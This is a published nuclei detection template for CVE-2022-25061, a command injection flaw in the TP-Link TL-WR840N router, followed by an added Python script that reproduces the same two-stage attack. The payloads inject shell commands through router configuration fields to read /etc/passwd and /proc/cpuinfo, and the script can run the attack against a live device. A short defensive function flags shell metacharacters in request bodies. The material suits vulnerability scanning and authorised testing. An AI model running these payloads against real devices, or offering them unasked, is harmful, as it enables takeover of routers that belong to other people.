The TP-Link TL-WR840N(ES)_V6.20_180709 router contains a command injection vulnerability in the oal_setIp6DefaultRoute component. An authenticated attacker can execute arbitrary system commands on the device, leading to complete compromise. Note that the check below needs valid web-interface credentials (it sends them as HTTP Basic authentication, via the username and password variables), which is why the template is tagged authenticated even though the recorded CVSS vector says PR:N.
PoC code [published]
id: CVE-2022-25061

info:
  name: TP-Link TL-WR840N - Command Injection
  author: ritikchaddha
  severity: critical
  description: |
    The TP-Link TL-WR840N(ES)_V6.20_180709 router contains a command injection vulnerability in the oal_setIp6DefaultRoute component. This vulnerability allows authenticated attackers to execute arbitrary system commands, leading to complete device compromise.
  remediation: |
    Update firmware to the latest version if available. If no firmware update is available, consider implementing network segmentation to limit access to the router's management interface.
  reference:
    - https://github.com/exploitwritter/CVE-2022-25061/blob/main/CVE-2022-25061.py
    - https://east-trowel-102.notion.site/CVE-2021-XXXX-Injection-of-commands-through-object-oal_setIp6DefaultRoute-EN-ddf9c1db199d49829269147ada6cb312
    - https://nvd.nist.gov/vuln/detail/CVE-2022-25061
    - http://router.com
    - http://tp-link.com
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-25061
    cwe-id: CWE-78
    epss-score: 0.76113
    epss-percentile: 0.98883
    cpe: cpe:2.3:o:tp-link:tl-wr840n_firmware:6.20_180709:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: tp-link
    product: tl-wr840n_firmware
    shodan-query: 'title:"TL-WR840N"'
  tags: cve,cve2022,tplink,router,rce,iot,authenticated

variables:
  filename: "{{to_lower(rand_text_alpha(3))}}"

http:
  - raw:
      - |
        POST /cgi?2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/plain
        Authorization: Basic {{base64(username + ':' + password)}}
        Referer: {{RootURL}}/mainFrame.htm

        [NOIP_DNS_CFG#0,0,0,0,0,0#0,0,0,0,0,0]0,5
        enable=1
        userName=;cat /etc/passwd > /tmp/{{filename}}.txt;
        password=;cat /proc/cpuinfo >> /tmp/{{filename}}.txt;
        userDomain=;cat /tmp/{{filename}}.txt;
        login=1

      - |
        POST /cgi?2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/plain
        Authorization: Basic {{base64(username + ':' + password)}}
        Referer: {{RootURL}}/mainFrame.htm

        [L3_IP6_FORWARDING#0,0,0,0,0,0#0,0,0,0,0,0]0,3
        __ifAliasName=ewan_ipoev6_d
        __ifName=;cat /tmp/{{filename}}.txt;
        defaultConnectionService=

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 490a0046304402200328a63174bddc584f8b9e135ede2127991486c8fa87fb34be61132e1c6db9ac02200d80f18c2bc83955628869175cf243727169e8e799a302218445ed924fb9580f:922c64590222798bb761d5b6d8e72950
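The nuclei template above is the page's PoC. The Python script below is an added example, not the template's or its author's code: it reproduces the same two-request check (stage 1 injects through the NOIP_DNS_CFG fields to stash /etc/passwd in a temp file, stage 2 reads it back through __ifName of the L3_IP6_FORWARDING object and the response is matched against the template's regex), but split into pure functions so the payload construction and the response matching can be exercised offline, plus a small defensive counterpart that flags /cgi request bodies carrying shell metacharacters. The target URL, credentials and the passwd-style response samples are constructed assumptions, not data captured from a device.

```python
"""Added example: standalone reproduction of the CVE-2022-25061 nuclei check.

Not the template's or author's code. Target, credentials and the sample
responses used for testing are assumed/constructed.
"""
import base64
import random
import re
import string
import urllib.error
import urllib.request

# Same response signature the template's matcher uses: a root entry from
# /etc/passwd whose password field is either 'x' (shadowed) or '*' (locked).
PASSWD_ROOT_RE = re.compile(r"root:[x*]:0:0")

# Characters that should never appear in a value posted to /cgi: the
# template's payloads rely on ';' to terminate the intended command.
SHELL_META_RE = re.compile(r"[;&|`$]")


def random_filename(length: int = 3) -> str:
    """Mirror of {{to_lower(rand_text_alpha(3))}}: a short random lowercase name."""
    return "".join(random.choice(string.ascii_lowercase) for _ in range(length))


def build_stage1(filename: str) -> str:
    """Body of the first POST to /cgi?2, as in the template.

    The userName/password/userDomain values each start with ';' so that the
    rest of the value runs as a separate shell command; the output is written
    to a temp file that stage 2 reads back.
    """
    return (
        "[NOIP_DNS_CFG#0,0,0,0,0,0#0,0,0,0,0,0]0,5\r\n"
        "enable=1\r\n"
        f"userName=;cat /etc/passwd > /tmp/{filename}.txt;\r\n"
        f"password=;cat /proc/cpuinfo >> /tmp/{filename}.txt;\r\n"
        f"userDomain=;cat /tmp/{filename}.txt;\r\n"
        "login=1\r\n"
    )


def build_stage2(filename: str) -> str:
    """Body of the second POST: __ifName is the injection point the CVE names
    (oal_setIp6DefaultRoute); its command output comes back in the response."""
    return (
        "[L3_IP6_FORWARDING#0,0,0,0,0,0#0,0,0,0,0,0]0,3\r\n"
        "__ifAliasName=ewan_ipoev6_d\r\n"
        f"__ifName=;cat /tmp/{filename}.txt;\r\n"
        "defaultConnectionService=\r\n"
    )


def looks_exploited(status: int, body: str) -> bool:
    """Equivalent of the template's 'and' matcher: HTTP 200 plus a root passwd line."""
    return status == 200 and PASSWD_ROOT_RE.search(body) is not None


def flags_injection(body: str) -> list:
    """Defensive counterpart: names of /cgi fields whose value carries a shell
    metacharacter. Run it over request bodies logged by a proxy in front of the
    router's management interface."""
    hits = []
    for line in body.splitlines():
        if "=" not in line or line.startswith("["):
            continue  # object header or malformed line
        name, value = line.split("=", 1)
        if SHELL_META_RE.search(value):
            hits.append(name)
    return hits


def post_cgi(root_url: str, username: str, password: str, body: str, timeout: int = 10):
    """Send one request the way the template does; returns (status, body)."""
    auth = base64.b64encode(f"{username}:{password}".encode()).decode()
    req = urllib.request.Request(
        f"{root_url}/cgi?2",
        data=body.encode(),
        method="POST",
        headers={
            "Content-Type": "text/plain",
            "Authorization": f"Basic {auth}",
            "Referer": f"{root_url}/mainFrame.htm",
        },
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as e:  # e.g. 401 on bad credentials
        return e.code, e.read().decode(errors="replace")


def check_target(root_url: str, username: str, password: str) -> bool:
    """Run both stages against a live router (assumed URL/credentials)."""
    filename = random_filename()
    post_cgi(root_url, username, password, build_stage1(filename))
    status, body = post_cgi(root_url, username, password, build_stage2(filename))
    return looks_exploited(status, body)


if __name__ == "__main__":
    import sys
    if len(sys.argv) != 4:
        sys.exit(f"usage: {sys.argv[0]} http://<router> <user> <pass>")
    print("vulnerable" if check_target(*sys.argv[1:]) else "not confirmed")
```

Only the two stage bodies and the matcher are needed to reason about the template; post_cgi and check_target exist so the same functions can be pointed at a lab device you are authorised to test. The regex deliberately matches either password-field form, since busybox-based firmware commonly ships /etc/passwd with root:x:... or root:*:....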